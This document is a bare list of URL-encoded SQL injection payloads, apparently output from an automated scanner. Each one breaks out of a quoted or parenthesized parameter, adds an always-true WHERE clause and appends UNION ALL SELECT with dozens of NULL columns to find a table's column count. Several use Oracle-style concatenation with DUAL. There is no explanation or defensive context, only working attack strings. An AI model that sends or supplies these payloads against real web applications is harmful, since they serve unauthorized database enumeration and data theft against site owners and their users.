1%27%29%20WHERE%205435%3D5435%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202562%3D2562%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202981%3D2981%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%204678%3D4678%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%205029%3D5029%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%209431%3D9431%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207277%3D7277%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%204467%3D4467%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%203740%3D3740%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%206435%3D6435%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201602%3D1602%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201191%3D1191%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201238%3D1238%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%209968%3D9968%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%208438%3D8438%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%205534%3D5534%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%209875%3D9875%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%206238%3D6238%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%209285%3D9285%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%204110%3D4110%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%206003%3D6003%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%206205%3D6205%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%201926%3D1926%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%209467%3D9467%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204254%3D4254%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204615%3D4615%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%207927%3D7927%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%206461%3D6461%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204756%3D4756%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%208584%3D8584%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%208011%3D8011%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%202738%3D2738%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%206824%3D6824%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27SHer%27%20FROM%20DUAL%20WHERE%202947%3D2947%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27VqiP%27%20FROM%20DUAL%20WHERE%207693%3D7693%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ahlL%27%20FROM%20DUAL%20WHERE%203496%3D3496%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27mXrF%27%20FROM%20DUAL%20WHERE%204670%3D4670%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27PtFE%27%20FROM%20DUAL%20WHERE%207324%3D7324%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27mgaR%27%20FROM%20DUAL%20WHERE%206542%3D6542%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Rnny%27%20FROM%20DUAL%20WHERE%208983%3D8983%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27BTot%27%20FROM%20DUAL%20WHERE%203166%3D3166%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27DjSa%27%20FROM%20DUAL%20WHERE%201513%3D1513%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27wBxy%27%20FROM%20DUAL%20WHERE%204044%3D4044%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27uqnL%27%20WHERE%208955%3D8955%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27RWPA%27%20WHERE%209577%3D9577%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27MGUM%27%20WHERE%208868%3D8868%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27QrhH%27%20WHERE%209200%3D9200%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 